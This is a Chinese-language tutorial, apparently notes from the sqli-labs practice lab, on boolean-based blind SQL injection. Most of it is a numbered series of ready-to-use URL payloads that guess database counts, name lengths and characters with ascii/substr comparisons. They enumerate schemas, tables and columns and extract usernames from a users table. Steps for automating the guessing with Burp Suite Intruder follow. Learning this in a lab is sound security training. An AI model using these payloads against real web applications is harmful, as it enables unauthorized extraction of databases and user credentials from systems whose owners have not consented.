目录
7.判断security库里第一个表的第一个字符的ascii值
10.判断security.users表的第一个字段的第一个字符的ascii值
12.判断user表里的第一行username字段的数据长度
13.判断user表里的第一行username字段的第一个字符的ascii值
1.判断闭合方式
2.判断数据库个数
?id=1' and (select count (schema_name) from information_schema.schemata)=数据库个数(从1开始猜) -- -
3.判断第一个数据库字符长度
?id=1' and (select length(schema_name) from information_schema.schemata limit 0,1)=18 -- -
4.根据ascii码判断每个库名的具体字符
?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105 -- - #可以用>和<判断大概位置
5.判断security库中表的个数
?id=1' and (select count(table_name) from information_schema.tables where table_schema='security')=4-- -
6.判断security库里第一个表名的长度
?id=1' and (select length(table_name) from information_schema.tables where table_schema='security' limit 0,1)=6 -- -
7.判断security库里第一个表的第一个字符的ascii值
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 -- -
8.判断security.users表的字段个数
?id=1' and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3-- -
9.判断security.users表的第一个字段的长度
?id=1' and (select length(column_name) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)=2 -- -
10.判断security.users表的第一个字段的第一个字符的ascii值
?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105 -- -
11.判断security.users表有多少行数据
?id=1' and (select count(username) from security.users)=13 -- -
12.判断user表里的第一行username字段的数据长度
?id=1' and (select length(username) from security.users limit 0,1)=4 -- -
13.判断user表里的第一行username字段的第一个字符的ascii值
?id=1' and ascii(substr((select username from security.users limit 0,1),1,1))=68-- -
?id=1' and substr(database(),1,1)='s' -- -
拦截流量包,右击Send to intruder发送到intruder
点击clear
选中字母s,点击add
点击payloads
添加a-z,A-Z,0-9
开始爆破
爆破结果
爆破成功